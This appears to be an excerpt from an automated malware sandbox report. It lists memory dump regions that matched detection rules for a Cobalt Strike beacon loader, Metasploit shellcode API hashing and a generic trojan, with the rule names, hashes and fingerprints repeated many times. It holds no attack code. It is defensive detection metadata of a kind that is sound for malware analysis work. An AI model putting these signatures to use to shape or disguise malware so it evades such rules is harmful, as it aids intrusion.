      Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
